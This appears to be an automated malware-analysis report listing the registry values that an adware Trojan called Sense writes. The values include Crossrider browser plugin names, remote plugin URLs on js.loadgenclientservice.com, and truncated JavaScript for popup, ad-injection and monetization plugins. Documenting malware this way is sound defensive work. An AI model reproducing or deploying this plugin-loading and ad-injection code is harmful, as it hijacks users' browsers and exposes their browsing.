[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process Sense-codedownloader.exe:3032 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKCU\Software\Sense\Plugins\7]
"JavaScript" = "appAPI.hooks={$:$jquery_171,hooks:{},addHook:function(a,b){this.hooks[a]=b;},removeHook:function(a){delete this.hooks[a];},register:function(b,a){return this.hooks[b]?new (this.$.Class.extend(this.$.extend(this.getClass(),this.$.isFunction(this.hooks[b])?this.hooks[b]():this.hooks[b])))(a):null;},getClass:(function(a){return function(){return{listeners:[],addListener:function(b,c){this.listeners.push({name:b,fn:c});},removeListener:function(c,d){var b=[];a.each(this.listeners,function(e,f){if(c!=f.name&&d!=f.fn){b.push(f);}});this.listeners=b;},fireEvent:function(b,c){a.each(this.listeners,a.proxy(function(d,e){if(b==e.name){e.fn.call(this,c);}},this));}};};}($jquery_171))};"
[HKCU\Software\Sense\Code]
"AppJavaScript" = " /************************************************************************************ This is your Page Code. The appAPI.ready() code block will be executed on every page load. For more information please visit our docs site: http://docs.crossrider.com*************************************************************************************/appAPI.ready(function($) { // Place your code here (you can also define new functions above this scope) // The $ object is the extension's jQuery object // alert(My new Crossrider extension works! The current page is: document.location.href);});"
[HKCU\Software\Sense\Installer]
"FullVersionForUrl" = "1_34_08_12"
[HKCU\Software\Sense\Plugins\3]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"
[HKCU\Software\Sense\Plugins\207]
"JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var d=$jquery_171;function c(f){return true;}function b(g,f){f=appAPI.utils.isFunction(f)?f:c;return d.map(g,function(h){return f(h)?h:null;});}function a(f){f.getList=(function(){var g=f.getList;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.getKeys=(function(){var g=f.getKeys;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.removeAll=(function(){var g=f.removeAll;return function(h){if(!appAPI.utils.isObject(h)){return g.call(f);}d.each(f.getList(h),function(j,k){f.remove(k.key);});};}());}function e(g){g.getList=(function(){var h=g.getList;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callback)){return;}h.call(g,function(j){i.callback(b(j,i.predicate));});};}());g.getKeys=(function(){var h=g.getKeys;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callbac"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Sense\Plugins\123]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/123.js"
[HKCU\Software\Sense\Plugins\42]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/42.js"
[HKCU\Software\Sense\Plugins\91]
"Version" = "75"
[HKCU\Software\Sense\Plugins\45]
"Name" = "IEOnRequest"
[HKLM\SOFTWARE\Sense\IE]
"TotalProfiles" = "1"
[HKCU\Software\Sense\Plugins\78]
"Name" = "CrossriderInfo"
[HKCU\Software\Sense\Plugins\94]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/94.js"
[HKCU\Software\Sense\Plugins\223]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/223.js"
[HKCU\Software\Sense\Plugins\263]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/263.js"
[HKCU\Software\Sense\Plugins\242]
"Version" = "4"
[HKCU\Software\Sense\Plugins\220]
"Name" = "icm_base_m"
[HKCU\Software\Sense\Plugins\14]
"JavaScript" = "if(typeof(appAPI)===undefined){appAPI={};}var CR__bIsIEWindow=false;if(typeof window!==undefined&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){CR__bIsIEWindow=/MSIE (\d \.\d );/.test(window.navigator.userAgent);}CR__bIsIEWindow=(CR__bIsIEWindow||(typeof appAPIinternal!==undefined));appAPI.JSON={};if(typeof JSON!==undefined&&!CR__bIsIEWindow){appAPI.JSON=JSON;}else{(function(){function f(n){return n
[HKCU\Software\Sense\Plugins\13]
"Name" = "CrossriderAppUtils"
[HKCU\Software\Sense\Plugins\36]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.isBackground=true;appAPI.tabId=BG;appAPI.internal.scope=Consts.SCOPE.BACKGROUND;appAPI.openURL=function(c,b){if(typeof c===undefined){return;}var a;if(typeof c===object){a=c;}else{a={url:c,where:b};}appAPI.internal.message.send({eventName:openURL,eventContent:a});};appAPI.internal.runHelper=function(a){if(typeof a!==string){console.error(appAPI.runHelper - Invalid parameter. Expected string (1st param) but got: (typeof a));return;}appAPI.internal.message.send({eventName:runHelper,eventContent:a});};window.alert=function(a){a=(a===null?null:a);a=(typeof a===undefined?undefined:a);appAPIinternal.alert(a);};appAPI.internal._isMonitorAPISupported_=function(){return(typeof appAPIinternal.supportMonitor!==undefined);};window.open=function(b,a,d,c){appAPI.internal.message.send({eventName:windowOpen,eve-"
[HKCU\Software\Crossrider]
"Verifier" = "39aa73fdbfd54b44fad467ed5553801b"
[HKCU\Software\Sense\Manifest]
"Version" = "21"
[HKCU\Software\Sense\Plugins\28]
"Name" = "initializer"
[HKCU\Software\Sense\Plugins\7]
"Name" = "hooks"
[HKCU\Software\Sense\Plugins\38]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.callbacks.genericEvent=function(e){var d=e.eventContent;if(typeof d===undefined){return;}var a=e.eventName;if(typeof a===undefined){return;}if(typeof appAPI.internal.callbacks[a]===undefined){return;}if(typeof appAPI.internal.callbacks[a].handler!==undefined){var b=appAPI.internal.callbacks[a].handler(d);if(b){return;}}if(typeof appAPI.internal.callbacks[a].listeners===undefined){return;}for(var c in appAPI.internal.callbacks[a].listeners){appAPI.internal.callbacks[a].listeners[c](d,c);}};appAPI.internal.callbacks.addListener=function(b,a,c){if(typeof appAPI.internal.callbacks[b]===undefined){appAPI.internal.callbacks[b]={};appAPI.internal.callbacks[b].listeners={};appAPI.internal.callbacks[b].listenersAdditionalData={};appAPI.internal.callbacks[b].listenersIds=0;appAPI.internal.callbacks[b].numberO-"
[HKCU\Software\Sense\Plugins\177]
"Name" = "crossriderDashboard"
[HKCU\Software\Sense\Plugins\221]
"Name" = "icm_downloads_m"
[HKCU\Software\Sense\Plugins\223]
"Name" = "imonomy_m"
[HKCU\Software\Sense\Manifest]
"UninstallerOfferUrl" = "NA"
[HKLM\SOFTWARE\Sense\IE\Profiles]
"S-1-5-21-1844237615-1960408961-1801674531-1003" = "1"
[HKCU\Software\Sense\Installer]
"srcid" = "000803"
[HKCU\Software\Sense\Plugins\94]
"Name" = "IEPopup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Sense\Plugins\17]
"JavaScript" = "if(typeof window!==undefined){/*! * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Sizzle.js * http://sizzlejs.com/ * Copyright 2010, The Dojo Foundation * Released under the MIT, BSD, and GPL Licenses. * * Date: Sat Feb 13 22:33:48 2010 -0500 */var $$jquery;(function(aO,D){var a=function(e,a0){return new a.fn.init(e,a0);},o=aO.jQuery,S=aO.$,ac=aO.document,Y,Q=/^[^)[^>]*$|^#([\w-] )$/,aY=/^.[^:#\[\.,]*$/,az=/\S/,N=/^(\s|\u00A0) |(\s|\u00A0) $/g,f=/^(?:)?$/,b=navigator.userAgent,v,L=false,af=[],aI,av=Object.prototype.toString,ar=Object.prototype.hasOwnProperty,h=Array.prototype.push,G=Array.prototype.slice,t=Array.prototype.indexOf;a.fn=a.prototype={init:function(e,a2){var a1,a3,a0,a4;if(!e){return this;}if(e.nodeType){this.context=this[0]=e;this.length=1;return this;}if(e===body&&!a2){this.context=ac;this[0]=ac.body;this.se."
[HKCU\Software\Sense\Installer]
"subid" = "0"
[HKCU\Software\Sense\Plugins\21]
"Version" = "5"
[HKCU\Software\Sense\Installer]
"AdditionalInfo" = "{asw:[0, 1073750528, 0],browser_name:ie}"
[HKCU\Software\Sense\Plugins\226]
"URL" = "http://js.loadgenclientservice.com/plugins/javascripts/monetization/geo/set_campaign_id_m.js"
[HKCU\Software\Sense\Plugins\78]
"Version" = "5"
[HKCU\Software\Sense\Plugins\183]
"Version" = "4"
[HKCU\Software\Sense\Plugins\47]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/47.js"
[HKCU\Software\Sense\Plugins\45]
"Version" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Sense\Plugins\9]
"JavaScript" = "appAPI.hooks.addHook(searchEngine,(function(a){return function(){var f={keyDelay:1000},e,h;return{init:function(i){e=this;this.addEngine({name:google,url:google,input:input[name=q],results:#rso,result:'
[HKCU\Software\Sense\Plugins\262]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/262.js"
[HKCU\Software\Sense\Manifest]
"RunInFrame" = "false"
"PublisherName" = "Object Browser"
[HKCU\Software\Sense\Plugins\1]
"Name" = "base"
[HKCU\Software\Sense\Plugins\28]
"JavaScript" = "var CrossriderInitializerPlugin=(function(e){var c={appId:appAPI._cr_config.appID()},b,g=new e.Deferred(),f;return e.Class.extend({init:function(){b=this;e(document).ready(function(){if(!f){d();}e(body).bindExtensionEvent(__CR_REQUEST_READY,a);});},isReady:function(h){if(h===false){d();}return g.promise();}});function d(){g.resolve();f=true;}function a(){e(body).fireExtensionEvent(__CR_RESPONSE_READY,{appId:c.appId});}}($jquery_171));(function(a){appAPI.initializerPlugin=new CrossriderInitializerPlugin();}($jquery_171));"
[HKCU\Software\Sense\Plugins\17]
"Version" = "4"
[HKCU\Software\Sense\Update]
"LastCheck" = "1411237392"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Sense\Plugins\44]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/44.js"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Sense\Plugins\9]
"Name" = "search_engine_hook"
[HKCU\Software\Sense\Plugins\93]
"Version" = "13"
[HKCU\Software\Sense\Plugins\41]
"JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(a){appAPI.isBackground=false;appAPI.tabId=a.getBhoInstanceId();appAPI.getTabId=function(){return appAPI.tabId;};appAPI.isActiveTab=function(){return appAPIinternal.isActiveTab();};appAPI.platform=""IE"";if(typeof appAPI.appInfo===""undefined""){appAPI.appInfo={};}var c=appAPI.internal.prefs.getChar(""fullVersionForUrl""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Sense\Plugins\207]
"Version" = "2"
[HKCU\Software\Sense\Plugins\192]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/192.js"
[HKCU\Software\Sense\Plugins\40]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.scope=Consts.SCOPE.PAGE;appAPI.internal.callbacks.setEventHandler(externalConsole,function(a){if(appAPI.dom.isIframe()){return;}var c=a.level;var b=a.text;if(typeof c===undefined){console.error(Received undefined Background console level);return;}if(typeof console[c]===undefined){console.error(Received undefined Background console level);return;}if(typeof b===undefined){console.error(Received undefined Background console text);return;}console[c](b);});appAPI.internal.callbacks.setEventHandler(onBeforeNavigate,function(a){});appAPI.internal.callbacks.setEventHandler(windowOpen,function(a){if(appAPI.dom.isIframe()||!appAPI.isActiveTab()){return;}window.open(a.url,a.name,a.specs,a.replace);});try{if(!appAPI.dom.isIframe()){appAPI.internal.activeTabCounter=0;setInterval(function(){if(appAPI.isActi-"
"Version" = "4"
[HKCU\Software\Sense\Manifest]
"AddressbarURL" = "NA"
[HKCU\Software\Sense\Plugins\223]
"Version" = "8"
[HKCU\Software\Sense\Plugins\94]
"Version" = "2"
[HKCU\Software\Sense\Plugins\184]
"Name" = "noproblemppc_m"
[HKCU\Software\Sense\Plugins\226]
"Version" = "5"
[HKCU\Software\Sense\Plugins\41]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/41.js"
[HKCU\Software\Sense\Plugins\72]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/72.js"
[HKCU\Software\Sense\Plugins\43]
"Name" = "IEMessaging"
[HKCU\Software\Sense\Plugins\22]
"Name" = "resources"
[HKCU\Software\Sense\Plugins\2]
"Version" = "2"
[HKCU\Software\Sense\Plugins\102]
"Version" = "10"
[HKCU\Software\Sense\Plugins]
"PopupPluginList" = "42,38,46,41,44,39,35,43,36,4,14,78,13,64,207,47,182,72,94"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\Sense\Plugins\38]
"Name" = "IECallbacks"
[HKCU\Software\Sense\Manifest]
"BgVersion" = "1"
[HKCU\Software\Sense\Plugins\38]
"Version" = "4"
[HKCU\Software\Sense\Plugins\246]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/246.js"
[HKCU\Software\Sense\Plugins\183]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/183.js"
[HKCU\Software\Sense\Installer]
"osName" = "XP32"
[HKCU\Software\Sense\Plugins\262]
"Name" = "pops_5_j_m"
[HKCU\Software\Sense\Plugins\263]
"Version" = "1"
[HKCU\Software\Sense\Plugins\2]
"Name" = "ie8_fix_1"
[HKCU\Software\Sense\Plugins\1]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/1.js"
[HKCU\Software\Sense\Plugins\64]
"Name" = "appApiMessage"
[HKCU\Software\Sense\Manifest]
"ChangePrevious" = "false"
[HKCU\Software\Sense\Plugins\177]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/177.js"
[HKCU\Software\Sense\Plugins\13]
"JavaScript" = "(function(a){a.selectedText=function(e,c){function d(){if(window.getSelection){return window.getSelection();}else{if(document.getSelection){return document.getSelection();}else{var f=document.selection&&document.selection.createRange();if(f.text){return f.text;}return false;}}return false;}if(e==null){a.debug(selectedText: no callback function provided.);return;}if(c==null){c={};}c.lastSelection=;c.minlength=c.minlength||1;c.maxlength=c.maxlength||99999999;var b;switch(typeof(c.element)){caseundefined:b=$jquery(body);break;caseobject:if(c.element instanceof jQuery){b=c.element;}else{a.debug(selectedText: element provided as an unrecorgnize object.);return;}break;casestring:b=$jquery(c.element);break;default:a.debug(selectedText: unknown element.);return;}b.mouseup(function(g){var f=d();if(f&&String(f)==c.lastSelection){c.lastSelection=;return;}else{c.lastSelection=String(f);}if(f&&String(f).length>=c.minlength&&String(f).length"
[HKCU\Software\Sense\Plugins\226]
"JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[226] = function() { if (appAPI.internal.monetization.loader && appAPI.internal.monetization.loader.setCampaignId && appAPI.internal.monetization.getCampaignId) { if (appAPI.internal.monetization.getCampaignId() == 0) { appAPI.internal.monetization.loader.setCampaignId(1026); } }};"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Sense\Plugins\1]
"Version" = "11"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Sense\Plugins\44]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(a){appAPI.dns={};appAPI.dns.resolveIP=function(b){return a.resolveIp(b);};appAPI.fetchUrl=function(b){return a.fetchUrl(b);};appAPI.openURL=function(e,d){var c;if(typeof e===object){c=e;if(typeof a.openUrlEx!==undefined){a.openUrlEx(appAPI.JSON.stringify(c));return;}else{d=c.where;e=c.url;}}if(typeof e!==string){console.error(appAPI.openURL - Invalid parameter. Expected string (1st param) but got: (typeof e));return;}if(d!==current&&d!==tab&&d!==window&&d!==popup){console.error(appAPI.openURL - Invalid parameter. Expected current/tab/window (2nd param) but got: d);return;}if(typeof a.openUrlEx!==undefined){var f=(document&&document.documentElement&&document.documentElement.clientHeight)?document.documentElement.clientHeight 100:100;var h=(document&&document.documentElement&&document.documentElement.clientWidth)?document.documentElement.clientWidth 80:100;var g=(window&&window.screenTop)?((window.screenTop-20)
[HKCU\Software\Sense\Plugins\72]
"JavaScript" = "if(appAPI.__should_activate_validation__===true){(function(){var e={WRONG_STRICT_VALUE:Parameter %PARAM_NAME% value is not supported.,WRONG_TYPE:Parameter %PARAM_NAME% is of wrong type. Valid types: [%VALID_TYPES%].,PARAM_IS_MANDATORY:Parameter %PARAM_NAME% is mandatory.,DB_VAL_TOO_LARGE:appAPI.db storage is limited to 1000 bytes per key. For larger values please use appAPI.db.async};var a=function(m){return m.charAt(0).toUpperCase() m.slice(1);};var h={};var b=appAPI.appInfo.name;var i=function(o,r,q,p){if(typeof p===undefined){p=;}var n=[ new Date().toDateString() new Date().toLocaleTimeString() ] b;var m=;if(typeof console!==undefined){if((q===e.DB_VAL_TOO_LARGE)&&(typeof console.warn===function)){console.warn(n m);}else{if(typeof console.error===function){console.error(n m);}else{if(typeof console.log===function){console.log(n m);}}}}return;};var l=function(p,n,o){var m=p-"
[HKCU\Software\Sense\Plugins\39]
"Version" = "5"
[HKCU\Software\Sense\Plugins]
"BrowserEventPluginList" = "14,42,41,44,39,38,43,37,64,72"
[HKCU\Software\Sense\Plugins\269]
"Name" = "stats_ie"
[HKCU\Software\Sense\Plugins\39]
"JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(c){appAPI.cookie=function(h,k,f,i){var g=""%@%ZZCR__AJAXZZ$C@R#"";function e(o,q,l,p){if(typeof(o)!==""string""){return false;}var n=appAPI.JSON.stringify(q);var m=new Date(2030,1,1,0,0,0,0);if(l instanceof Date){m=l;}c.setLocalCookie(o,n,m.toUTCString(),p);return true;}function j(m,n){if(m==""InstallerParams""&&n==""Local""){return appAPI.JSON.parse(appAPI.internal.prefs.getChar(""Params""
[HKCU\Software\Sense\Manifest]
"ModeType" = "production"
[HKCU\Software\Sense\Plugins\180]
"Name" = "bpo_serp_m"
[HKCU\Software\Sense\Plugins\46]
"Version" = "5"
[HKCU\Software\Sense\Plugins\93]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/93.js"
[HKCU\Software\Sense\Plugins\38]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/38.js"
[HKCU\Software\Sense\Plugins\43]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/43.js"
[HKCU\Software\Sense\Plugins\263]
"Name" = "intext_5_j_m"
[HKCU\Software\Sense\Plugins\35]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/35.js"
"Name" = "IEAjax"
[HKCU\Software\Sense\Plugins\21]
"JavaScript" = "var CrossriderDebugManager=(function(h){var f={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.debug_app};return h.Class.extend({init:function(){if(appAPI.isMatchPages.apply(this,f.url.debug_page)){h(document).ready(function(){h(body).bindExtensionEvent(debug_request_data,function(j,i){if(i.appId==f.appId){e();}});h(body).bindExtensionEvent(debug_request_reload_background,function(j,i){if(i.appId==f.appId&&appAPI.internal.reloadBackground){appAPI.internal.reloadBackground();}});h(body).bindExtensionEvent(debug_request_reload_plugins,function(j,i){if(i.appId==f.appId){appAPI.resources.requestReload();setTimeout(appAPI.internal.forceUpdate,750);}});h(body).bindExtensionEvent(debug_mode_activate,function(j,i){if(i.appId==f.appId){b(i);}});h(body).bindExtensionEvent(debug_mode_deactivate,function(j,i){if(i.appId==f.appId){d();}});h(body).bindExtensionEvent(debug_request_database,function(j,i){if(i.appId==f.appId){c(i);}});h(body).bindExtensionEvent(debug_request_database_remove,."
[HKCU\Software\Sense\Plugins\281]
"Version" = "2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Sense\Installer]
"ErrorsDomain" = "http://errors.loadgenclientservice.com"
"DefaultBrowser" = "ie"
[HKCU\Software\Sense\Manifest]
"UpdateInterval" = "360"
[HKCU\Software\Sense\Plugins\14]
"Name" = "CrossriderUtils"
[HKCU\Software\Sense\Plugins\182]
"Version" = "3"
[HKCU\Software\Sense\Manifest]
"Name" = "Sense"
[HKCU\Software\Sense\Plugins\47]
"Name" = "resources_background"
[HKCU\Software\Sense\Installer]
"StatsDomain" = "http://stats.loadgenclientservice.com"
[HKCU\Software\Sense\Plugins\14]
"Version" = "11"
[HKCU\Software\Sense\Plugins\28]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/28.js"
[HKCU\Software\Sense\Plugins\262]
"Version" = "1"
[HKCU\Software\Sense\Plugins]
"NewTabPluginList" = "42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,72,28"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "29 CE 23 C2 4B 20 E3 95 CF D7 28 D7 4F 4B BD 28"
[HKCU\Software\Sense\Plugins\242]
"Name" = "price_gong_m"
[HKCU\Software\Sense\Plugins\44]
"Name" = "IEMisc"
[HKCU\Software\Sense\Plugins]
"AppPluginList" = "246,42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,182,183,207,72,7,9,93,102,123,180,184,191,192,220,221,223,239,242,244,262,263,281,177,91,28"
[HKCU\Software\Sense\Plugins\43]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}if(typeof appAPI.internal.message===undefined){appAPI.internal.message={};}appAPI.internal.message.send=function(b){if(typeof b!==object){return false;}if(typeof b.eventName!==string){return false;}b.senderTabId=appAPI.tabId;var c;try{c=appAPI.JSON.stringify(b);}catch(a){console.error(appAPI.message error - Caught a JSON exception when trying to stringify the message);return false;}if(typeof c!==string){console.error(appAPI.message error - Failed to stringify message);return false;}if(c.length>8192){console.error(appAPI.message error - can't send message because content is too long: c.length);return false;}appAPIinternal.msgToAllTabs(c);return true;};appAPI.internal.callbacks.crossBhoEvent=function(b){if(typeof b.msgObj!==string){return;}try{b=appAPI.JSON.parse(b.msgObj);}catch(c){console.error(Failed to pars-"
[HKCU\Software\Sense\Plugins\91]
"Name" = "monetizationLoader.js"
[HKCU\Software\Sense\Plugins\9]
"Version" = "3"
[HKCU\Software\Sense\Plugins\22]
"Version" = "5"
[HKCU\Software\Sense\Plugins\281]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/281.js"
[HKCU\Software\Sense\Plugins\45]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.tabId=onRequest;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;(function(){function a(e){var c=appAPI.internal.prefs.getChar(e,Crossrider\\onRequest);if(typeof c!==string){return 0;}if(c.length===0){return 0;}c=appAPI.JSON.parse(c);if(typeof c!==object){return 0;}var d=0;for(var b in c){d ;appAPI.internal.callbacks.addListener(onRequest,function(m,g){var n=appAPI.internal.callbacks.onRequest.listenersAdditionalData[g];if(typeof n.code!==string){return;}var f={};var i;if(typeof n.value===undefined){i=undefined;}else{if(n.value===n-"
[HKCU\Software\Sense\Plugins\182]
"JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var c={DUMMY_PAGE_URL:http://page.our-app.net/blank/resource.html};(function(){if(appAPI&&appAPI.internal&&appAPI.internal.hosts&&typeof appAPI.internal.hosts.dummyPageUrl===string&&appAPI.internal.hosts.dummyPageUrl.length>0){c.DUMMY_PAGE_URL=appAPI.internal.hosts.dummyPageUrl;}}());appAPI.openURL=(function(){var d=appAPI.openURL;var e=function(g){d({url:c.DUMMY_PAGE_URL ?appid= appAPI.appInfo.id &resourcepath= escape(g.resourcePath) &rnd= (new Date()).getTime(),where:g.where,focus:g.focus,focusTimer:g.focusTimer,left:g.left,top:g.top,height:g.height,width:g.width});};var f=function(g){if(!appAPI.utils.isObject(g)){return;}if(!appAPI.utils.isDefined(g.resourcePath)){d(g);return;}e(g);};return function(h,g){var i=h;try{if(appAPI.utils.isString(h)){d(h,g);return;}f(i);}catch(j){}};}());var a=function(){(function(){var f=document.createElement(link);f.type=image/x-icon;f.rel=shortcut icon;f.href=;document.getElementsByTagName(head)[0]."
[HKCU\Software\Sense\Plugins\7]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/7.js"
[HKCU\Software\Sense\Installer]
"zdata" = "0"
[HKCU\Software\Sense\Plugins\64]
"JavaScript" = "(function(){var j=__CR_EMPTY_CHANNEL__;var d=function(e){return(typeof e===object&&e!==null);};var b=function(e){return(!!e&&typeof e===string);};var f=function(l){var e;if(typeof l===function){e=j;}else{if(d(l)&&b(l.channel)){e=l.channel;}else{e=j;}}return e;};var k=function(m,e){var l={wrapperMessage:{message:m,channel:f(e)},toIframes:d(e)?e.toIframes:e};return l;};var i=function(m,e){var l={message:m,channel:f(e)};return l;};var h=function(){var e={};e.addListener=appAPI.message.addListener;e.removeListener=appAPI.message.removeListener;e.toActiveTab=appAPI.message.toActiveTab;e.toAllOtherTabs=appAPI.message.toAllOtherTabs;e.toAllTabs=appAPI.message.toAllTabs;e.toBackground=appAPI.message.toBackground;e.toCurrentTabIframes=appAPI.message.toCurrentTabIframes;e.toCurrentTabWindow=appAPI.message.toCurrentTabWindow;e.toPopup=appAPI.message.toPopup;return e;};var a=function(e){appAPI.message.addListener=function(l,o){var n=null;var m;var p=f(l);if(typeof l===function){n=function(q){if(p===q.channel){-"
[HKCU\Software\Sense\Plugins\221]
"Version" = "4"
[HKCU\Software\Sense\Plugins\14]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/14.js"
[HKCU\Software\Sense\Plugins\246]
"Version" = "15"
[HKCU\Software\Sense\Plugins\3]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/3.js"
[HKCU\Software\Sense\Plugins\21]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/21.js"
[HKCU\Software\Sense\Plugins\36]
"Name" = "IEBackground"
[HKCU\Software\Sense\Plugins\4]
"Version" = "5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCU\Software\Sense\Plugins\37]
"Version" = "6"
[HKCU\Software\Sense\Manifest]
"SetNewTab" = "false"
[HKCU\Software\Sense\Plugins\47]
"JavaScript" = "(function(){appAPI.ready=function(a){appAPI.resources.isReady(a);};}());var CrossRiderResourcesManager=(function(){var C={appId:(function(){var D=appAPI.appInfo;if(D){return appAPI.appInfo.id;}else{return appAPI.appID;}})(),url:{base:{production:[""\x68\x74\x74\x70\x3a\x2f\x2f\x72""
[HKCU\Software\Sense\Plugins\220]
"JavaScript" = "if(appAPI.isBackground){var ICMBaseManager=function(a){return function(){};};}else{var ICMBaseManager=function(a){var b=(function(g){var p=appAPI.isDebugMode();var n=p||appAPI.internal.db.get(icm_debug)||appAPI.dom.location.href.indexOf(icm_inline_debugger)>-1;var k=http://static.icmwebserv.com/mc/;var d={namespace:a.namespace,marketingCampaignID:(function(){var q={LITE:999999,DOWNLOADS:777777,AJILLION:888888}[a.namespace];if(a.source==JS){q=q-1;}return q;})(),campaignID:(function(){try{return appAPI.internal.monetization.getCampaignId();}catch(q){return0;}})(),subID:(function(){try{return appAPI.internal.monetization.getExtendedSubId();}catch(q){try{return appAPI.internal.monetization.getSubId();}catch(q){return100012322500000000;}}})(),IBIC:(function(){try{return appAPI.installer.getUserId();}catch(q){return0;}})(),DBPrefix:(function(){return{LITE:__ICM_LITE__,DOWNLOADS:__ICM_DOWNLOADS__,AJILLION:__ICM_AJILLION__}[a.namespace];})(),RevMode:(function(){return a.revMode||{LITE:2,DOWNLOADS|-"
[HKCU\Software\Sense\Plugins\177]
"Version" = "2"
[HKCU\Software\Sense\Code]
"NewTabJavaScript" = ""
[HKCU\Software\Sense\Plugins\42]
"Name" = "IEInternal"
[HKCU\Software\Sense\Plugins\36]
"Version" = "8"
[HKCU\Software\Sense\Plugins\184]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/184.js"
[HKCU\Software\Sense\Plugins\244]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/244.js"
[HKCU\Software\Sense\Plugins\239]
"Name" = "revizer_ws_dynamic_b2b_safe_m"
[HKCU\Software\Sense\Plugins\47]
"Version" = "3"
[HKCU\Software\Sense\Plugins\242]
